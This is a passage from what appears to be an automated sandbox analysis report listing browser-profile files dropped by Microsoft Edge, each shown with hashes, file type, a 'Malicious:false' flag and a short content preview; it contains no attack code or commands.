                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16
                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Site Characteristics Database\LOG

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):299
                                                                                                                                      Entropy (8bit):5.105366072213743
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:7PWS+FKDERM1N723fQmmUh2gr52KLlpPWStVq2PN723fQmmUh2ghZIFUv:7x6vRsa/hHJLTxtVvVa/hHh2FUv
                                                                                                                                      MD5:F8AE7BE0B9AFE0AFA7F24290CCC78DA8
                                                                                                                                      SHA1:E0AF525787FFDF4AF5E2E634582BB6E2CB0C1CB0
                                                                                                                                      SHA-256:83794B45650D4373929386032AF9D0AE3B62380BC75D6CD8F96A77189B76FB34
                                                                                                                                      SHA-512:ED896AA8CE58B1F744C182E951C900F50D1E8928CFA96401E891BF1D08966AFAD6FB803CB2FE1ADCD947F3B3F27D5BDD87395CA9D616BEF2FEAE47B7AF8F6FED
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:2024/12/18-13:28:23.212 1604 Creating DB C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Site Characteristics Database since it was missing..2024/12/18-13:28:23.251 1604 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Site Characteristics Database/MANIFEST-000001.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Site Characteristics Database\MANIFEST-000001

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):41
                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Sync Data\LevelDB\000001.dbtmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16
                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Sync Data\LevelDB\000003.log

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):46
                                                                                                                                      Entropy (8bit):4.019797536844534
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:sLollttz6sjlGXU2tkn:qolXtWswXU2tkn
                                                                                                                                      MD5:90881C9C26F29FCA29815A08BA858544
                                                                                                                                      SHA1:06FEE974987B91D82C2839A4BB12991FA99E1BDD
                                                                                                                                      SHA-256:A2CA52E34B6138624AC2DD20349CDE28482143B837DB40A7F0FBDA023077C26A
                                                                                                                                      SHA-512:15F7F8197B4FC46C4C5C2570FB1F6DD73CB125F9EE53DFA67F5A0D944543C5347BDAB5CCE95E91DD6C948C9023E23C7F9D76CFF990E623178C92F8D49150A625
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...n'................_mts_schema_descriptor...

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Sync Data\LevelDB\CURRENT (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16
                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Sync Data\LevelDB\LOG

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):275
                                                                                                                                      Entropy (8bit):5.249719881757547
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:7PWS4HM1N723fQmux2KLlpPWS4u4q2PN723fQmEIFUv:7x4HsasVLTx4u4vVajFUv
                                                                                                                                      MD5:CCF8B96C871CB6743C07FF4366D65566
                                                                                                                                      SHA1:D5852C0EC09BB5EEEE3070A417B604B166227802
                                                                                                                                      SHA-256:F097AB14E24AA9377E4DD3F3E92E559818D2BA63955597F0D2FEF86529EACD79
                                                                                                                                      SHA-512:2E2A3BEF04B03126B2CEACDBC1B66F0BAF929A89CB9E9ACE7615E19BA7FA40A5DC7099C5A273E3301C654C03680E5EA67F30C024C9E390B857A8A043500C0755
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:2024/12/18-13:28:23.159 16f4 Creating DB C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Sync Data\LevelDB since it was missing..2024/12/18-13:28:23.531 16f4 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Sync Data\LevelDB/MANIFEST-000001.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Sync Data\LevelDB\MANIFEST-000001

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):41
                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Top Sites

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):20480
                                                                                                                                      Entropy (8bit):0.3528485475628876
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:TLiN6CZhDu6MvDOF5yEHFxOUwa5qguYZ75fOSiPe2d:TLiwCZwE8I6Uwcco5fBtC
                                                                                                                                      MD5:F2B4FB2D384AA4E4D6F4AEB0BBA217DC
                                                                                                                                      SHA1:2CD70CFB3CE72D9B079170C360C1F563B6BF150E
                                                                                                                                      SHA-256:1ECC07CD1D383472DAD33D2A5766625009EA5EACBAEDE2417ADA1842654CBBC8
                                                                                                                                      SHA-512:48D03991660FA1598B3E002F5BC5F0F05E9696BCB2289240FA8CCBB2C030CDD23245D4ECC0C64DA1E7C54B092C3E60AE0427358F63087018BF0E6CEDC471DD34
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g.....4....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Visited Links

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):131072
                                                                                                                                      Entropy (8bit):0.002110589502647469
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:ImtVCl:IiVCl
                                                                                                                                      MD5:595EBDC51542E21A3FB1CB0D2FD7711A
                                                                                                                                      SHA1:2738FB122F6900D374EE906C070807E3328B677C
                                                                                                                                      SHA-256:2F3F313A97ABD287E446B43D92A83599C336815E35488EB94A7DC42B8FCDDAF1
                                                                                                                                      SHA-512:D0FF8CD0754C00D2C14EE951FB64CBDB3F28B8943FAB4520C02663739B186F0833230DDC6249476862921A4F1A6A11F47D5EFD8BCF416E00A24BB58DB9088515
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:VLnk.....?..........8.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Web Data

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 87, cookie 0x36, schema 4, UTF-8, version-valid-for 3
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):178176
                                                                                                                                      Entropy (8bit):0.9433219984290606
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Drb2qAdB9TbTbuDDsnxCkvSAzWn0lKOMq+Jw:D/2qOB1nxCkvSACnqKOMq+y
                                                                                                                                      MD5:9F46CDD267F3762473D94A68E93602A8
                                                                                                                                      SHA1:3508D5622E6F713CEBEF50E29225AB704893339F
                                                                                                                                      SHA-256:ED08B3C6767787F7B2132116CEEC7E735D2172657DEF1380344F89A0B8AF6EDD
                                                                                                                                      SHA-512:E565B009799BD5E219E56FB02331452186A26D9EFC87F176AD9E5B52521E5F3741E45A5E4C3E413DDF1FEDAEBC59FA99918D5DD081AA7F2AFCAD328B96884D7C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:SQLite format 3......@ .......W...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\Web Data-journal

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2568
                                                                                                                                      Entropy (8bit):0.056537765494375586
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:73lEl1lOtllf:TlEQ
                                                                                                                                      MD5:6F98B35E7C9467093D226BB7CCC0C300
                                                                                                                                      SHA1:5C9CCB307AD7A0491F469C2B2B9BB7D497D55238
                                                                                                                                      SHA-256:D442767B36733C4F8C8C63F146732B32E3E4D3A9AC61E32B18BF572A065558B5
                                                                                                                                      SHA-512:67099E53905EF20405C73893F5666D8618ABBC49F36AB831E294E24040D20533080D4FCBF008F14ACE55952934251E20D0712526E529DF0B13BB7CB35DC4E31A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...............z...W....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\arbitration_service_config.json

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text, with very long lines (3852), with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):11417
                                                                                                                                      Entropy (8bit):5.237554345326078
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:dH4vrmORnBtW4PoiUDNaxvR5FCHFcoaSbqGEDu:dH4vrmonPW4jR3GaSbqGEDu
                                                                                                                                      MD5:DF790948C5A7B5DD19D033FE6C793868
                                                                                                                                      SHA1:0C4A681E07505CA84997CE78FEEE1F0D88CB8E2A
                                                                                                                                      SHA-256:CB4049061A6A78013D20CC4AB396BEF4F6C35306887BE76765EED4E51EEE702D
                                                                                                                                      SHA-512:251C3B5DE5452E2F40C648BDB2E3D1CE2315DD4DFFAF4B4E5E08528DBAAB80535F1A82E183A65AB7DCA0C2926AE5D6B61F06DB390D0E3B8D8E77E826B21042CB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{.. "ArbitrationSignal": "(time_elapsed_since_last_notification)-3600^(notification_quick_dismiss_rate_lower_ci+notification_disable_rate+notification_snooze_rate)",.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f41

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\b04c802b-1c2e-4e77-b60f-ffc456687db0.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1
                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\shared_proto_db\000001.dbtmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16
                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\shared_proto_db\CURRENT (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16
                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\shared_proto_db\LOG

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):271
                                                                                                                                      Entropy (8bit):5.285451531627504
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:7PWf81N723fQmKrl2KLlpPWvq2PN723fQmKrK+IFUv:79amLTsvVat3FUv
                                                                                                                                      MD5:AE3C065096B9AAC12A36133B3722B15F
                                                                                                                                      SHA1:7F7FE7A7E48C5AB6CFBEC8539741BAF428050CAD
                                                                                                                                      SHA-256:73F376C28D1C7DE23F82863A2B6EC4566F43FF2AE332E48C5589F6F911723957
                                                                                                                                      SHA-512:DF1F4DE9B597179325D63E784AD02FFF5593BD68CA120F85549BD2E28DEF2D8B2AF56AB2197F2871D776C3E392E0D31CE8A5C4CE7E292CC2C72CCA90D7EFA89B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:2024/12/18-13:28:24.644 1c30 Creating DB C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\shared_proto_db since it was missing..2024/12/18-13:28:24.776 1c30 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\shared_proto_db/MANIFEST-000001.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\shared_proto_db\MANIFEST-000001

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):41
                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\shared_proto_db\metadata\000001.dbtmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16
                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\shared_proto_db\metadata\000003.log

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):34
                                                                                                                                      Entropy (8bit):3.2608241254905095
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:G0XttkJcsn:G0Xtqcs
                                                                                                                                      MD5:144F9E14F35606E2067B5DF655E3102E
                                                                                                                                      SHA1:B16B22A620A679A811068E67C65C67F97500BEC9
                                                                                                                                      SHA-256:BCA6A12EEF67DFB649266150CA95D24212F5F566182B85267694969575C5AB4C
                                                                                                                                      SHA-512:9C148840D66B9D7C2C55668A25E2D2AAE328A4F11016D440C7F5D930D53ABA0DC3DFF74552EC18A89EEBD370B09BD0A5F21A70F8A0D8B1847D1FE40BDFEFA4EC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.h.6.................__global... .

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\shared_proto_db\metadata\CURRENT (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):16
                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\shared_proto_db\metadata\LOG

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):289
                                                                                                                                      Entropy (8bit):5.218849752022871
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:7PWbHM1N723fQmKrzs52KLlpPWepN4q2PN723fQmKrzAdIFUv:7GHsal9LTLpN4vVa6FUv
                                                                                                                                      MD5:BAB2BB056895987677971297C5EE7B7F
                                                                                                                                      SHA1:21DD2D2C6D2D259550386E01477AB81F23DBF2D7
                                                                                                                                      SHA-256:7E9388594CCB8C27D8A78A44F0D8ED472397FA9B1BB814D1FE119D84D9D6FF65
                                                                                                                                      SHA-512:38631AF745D3E331158AFB21E24B6AEDEB3CD4048C255BB4C614E58602ECCAD24051E62E944C3C05C6DB545D08F4194FB5F7150E449BCC2446E5A79D0043DEFA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:2024/12/18-13:28:24.620 16f4 Creating DB C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\shared_proto_db\metadata since it was missing..2024/12/18-13:28:24.640 16f4 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\shared_proto_db\metadata/MANIFEST-000001.

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Default\shared_proto_db\metadata\MANIFEST-000001

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):41
                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\GrShaderCache\index

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):262512
                                                                                                                                      Entropy (8bit):9.47693366977411E-4
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:LsNlKhAtq:Ls3Kq
                                                                                                                                      MD5:87F447A85DDE3999DEDFE5F92627F14F
                                                                                                                                      SHA1:A163D5C03D57EDDCA08B657193D0DF7079C2AA6A
                                                                                                                                      SHA-256:46FEF381B52F68B21E80CC9AFA785E50BEC6E746A79547578D9AF130AD46EFF5
                                                                                                                                      SHA-512:3B6E6025F647B43546758C5DF5EBBD56E22936AE8A2B5722D3ECBAAD13DCC7954F07565A466BF936A0270A2FE8D11A20BAB8A166E4AD37E3F22C56BBBC4ECA22
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:............................................%./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Users\user\AppData\Local\Temp\chr8AD6.tmp\Last Version

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):13
                                                                                                                                      Entropy (8bit):2.6612262562697895
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:NYLFRQZ:ap2Z
                                                                                                                                      MD5:B64BD80D877645C2DD14265B1A856F8A
                                                                                                                                      SHA1:F7379E1A6F8CE062E891C56736C789C7EA77CD6A
